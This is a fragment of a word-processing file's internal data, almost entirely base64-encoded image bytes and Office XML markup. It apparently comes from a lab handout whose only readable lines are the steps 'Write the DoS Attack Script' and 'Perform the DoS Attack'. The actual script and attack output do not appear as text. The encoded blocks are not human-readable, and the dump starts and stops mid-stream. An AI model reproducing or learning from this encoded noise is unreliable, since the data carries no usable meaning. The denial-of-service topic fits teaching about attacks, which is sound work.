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&#10;/4Ti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sifpocwMAAGwI&#10;AAAOAAAAAAAAAAAAAAAAADwCAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQBTLS/KrMgA&#10;AKzIAAAVAAAAAAAAAAAAAAAAANsFAABkcnMvbWVkaWEvaW1hZ2UxLmpwZWdQSwECLQAUAAYACAAA&#10;ACEArGRDSOAAAAAKAQAADwAAAAAAAAAAAAAAAAC6zgAAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAG&#10;AAgAAAAhAFhgsxu6AAAAIgEAABkAAAAAAAAAAAAAAAAAx88AAGRycy9fcmVscy9lMm9Eb2MueG1s&#10;LnJlbHNQSwUGAAAAAAYABgB9AQAAuNAAAAAA&#10;">
                <v:shape id="Image 44" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:94;width:32277;height:2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RvwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvgv8hPKE3zVbFltXsIoKl0CJopefH5rlZmrwsSdTtv28KhR6HmfmG2dSDs+JGIXaeFTzOChDE&#10;jdcdtwrOH/vpM4iYkDVaz6TgmyLU1Xi0wVL7Ox/pdkqtyBCOJSowKfWllLEx5DDOfE+cvYsPDlOW&#10;oZU64D3DnZXzolhJhx3nBYM97Qw1X6erU0AvW2MXZ/eEb6GZHxafe/veWqUeJsN2DSLRkP7Df+1X&#10;rWC5hN8v+QfI6gcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQApYWRvwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;">
                  <v:imagedata r:id="rId38" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 45" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:32372;height:27223;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3237230,272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mVxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6kaxElJXKYLQRlC06vmRfU1Cs2/T3dWk/fVdQehxmJlvmPmyN424kvO1ZQXjUQKC&#10;uLC65lLB8WP9lILwAVljY5kU/JCH5WLwMMdM2473dD2EUkQI+wwVVCG0mZS+qMigH9mWOHqf1hkM&#10;UbpSaoddhJtGTpJkJg3WHBcqbGlVUfF1uBgFyfn063bT9/N2teny8Wn7fczTXKnHYf/6AiJQH/7D&#10;9/abVjB9htuX+APk4g8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAv7ZmVxQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,2721991r3237229,l3237229,,,,,2721991xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF20F1A" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="561"/>
        </w:tabs>
        <w:spacing w:before="5" w:after="13"/>
        <w:ind w:left="561" w:hanging="201"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Perform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733A2443" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="374"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F52F84D" wp14:editId="3D0C7AC3">
                <wp:extent cx="3620770" cy="2221230"/>
                <wp:effectExtent l="0" t="0" r="0" b="7619"/>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0770" cy="2221230"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3620770" cy="2221230"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="47" name="Image 47"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9588"/>
                            <a:ext cx="3601720" cy="2202179"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="48" name="Graphic 48"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="3611245" cy="2211705"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3611245" h="2211705">
                                <a:moveTo>
                                  <a:pt x="0" y="2211704"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3611245" y="2211704"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3611245" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2211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090F237" id="Group 46" o:spid="_x0000_s1026" style="width:285.1pt;height:174.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="36207,22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L7NwAwAAbAgAAA4AAABkcnMvZTJvRG9jLnhtbJxW227bOBB9L7D/&#10;QOi9kaU6cSLEKRZNGwQousE2i32mKUoiSpEsSV/y953hRXLtXWS3ASIPzcPR4eGZoW/fH0ZJdtw6&#10;odW6qC4WBeGK6Vaofl389fzp7XVBnKeqpVIrvi5euCve3/325nZvGl7rQcuWWwJJlGv2Zl0M3pum&#10;LB0b+EjdhTZcwWSn7Ug9DG1ftpbuIfsoy3qxuCr32rbGasadg2/v42RxF/J3HWf+j65z3BO5LoCb&#10;D08bnht8lne3tOktNYNgiQb9BRYjFQpeOqW6p56SrRVnqUbBrHa68xdMj6XuOsF42APsplqc7ObB&#10;6q0Je+mbfW8mmUDaE51+OS37snuw5qt5spE9hJ81++ZAl3Jv+uZ4Hsf9DD50dsRFsAlyCIq+TIry&#10;gycMvnx3VS9WKxCewVxd11X9LmnOBjiYs3Vs+PjKypI28cWB3kTHCNbAf5IIojOJXrcSrPJby4uU&#10;ZPxPOUZqv23NWzhNQ73YCCn8S3AmnBuSUrsnwVBdHICaT5aIdl0sVwVRdISKeBxpzwmMQfKMwRV4&#10;AmcJNlKYT0JK1B3jRBUMfWKIf9htNNu9ZtuRKx+rx3IJrLVygzCuILbh44YDPfvYVnBoULkeKBor&#10;lI+l4rzlng34/g54/AkFhkRpM00E0jNP3IJL9jpxzM1lfVkQMMbN5fV1TD/7ZlGt6sk3i7pa3SBi&#10;On3aGOv8A9cjwQAYAxOQnDZ099klThmSlIw0Aj9ghS0Ceo7LGsLoTMX/VVZfB2o4UMC0RwcNDTAe&#10;9EPqMsuw14TCyoN94ehfVFquruqgUggAS5tZpaqql6BhrK6qWi0uT1Ri26jSsTLQpdqoEag15Igd&#10;VA5RS2yYMjRMD74AfQsCDXMTjwmsjuswKYZkj5WeuAxY6JEKzo96x591QPq53CNimcjOGKmOsVPO&#10;0DwwZ16RcfnThNzH+NBmwC4ZkT8jEpyVm9UrmJ+Z5ixMasejH1GAYMxJFMh4LLtUqE8wO8rgtBRt&#10;rmFn+80HacmO4v0U/pImP8HQyPfUDREXphJMKnj37B6MNrp9gS6zB7utC/d9S7GlyUcF9sYbMAc2&#10;B5scWC8/6HBPhuOCdz4f/qbWpArzYLsvOrv8rNAiFlcq/fvW606EKpwZJaJQcSEKV1oQLl2/eGce&#10;jwNq/pFw9wMAAP//AwBQSwMECgAAAAAAAAAhAAGHcBlVWgEAVVoBABUAAABkcnMvbWVkaWEvaW1h&#10;Z2UxLmpwZWf/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMAAwICAwICAwMDAwQDAwQFCAUFBAQFCgcH&#10;BggMCgwMCwoLCw0OEhANDhEOCwsQFhARExQVFRUMDxcYFhQYEhQVFP/bAEMBAwQEBQQFCQUFCRQN&#10;Cw0UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFP/AABEI&#10;AkQDt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vUP2kfDdhaXM/2HUbnyHjhZLd7V90z/dhVvP2GQ4zs3ZAIJwCCfPvDH7fvgHxP4z0Pwyn&#10;h7xbp2o6xdwWdudQsYI0V5nCIzYnLBcsOQDXwtrfi+bwlonhuy0DT9Pi1e8sYb+a7Q3JeLy186Pb&#10;mc5KhgMMCDtxgjAHUfAPx7q3xB8VeDrTxLcf2l/ZHiXRnsLuVR5kDNdoNgPoVQjHfqckAiPadUrq&#10;/wDwD6yPDtWMp0MRLkqcrlFWunaHO02tny2fztc/VK8v7XTo0e6uYbZHdY1aZwgZycKoJ6knoKbN&#10;qllb39vYy3kEV7cAmG2eVRJIAMkqucnABziuJ+NcrweGNNliha4kTVrRliUgFyJOFBPHPSp/hn5G&#10;r6fP4ou7mO81i+ylw5BX7Ein/j1VTygQ9c8sSWOcitGfJI7ms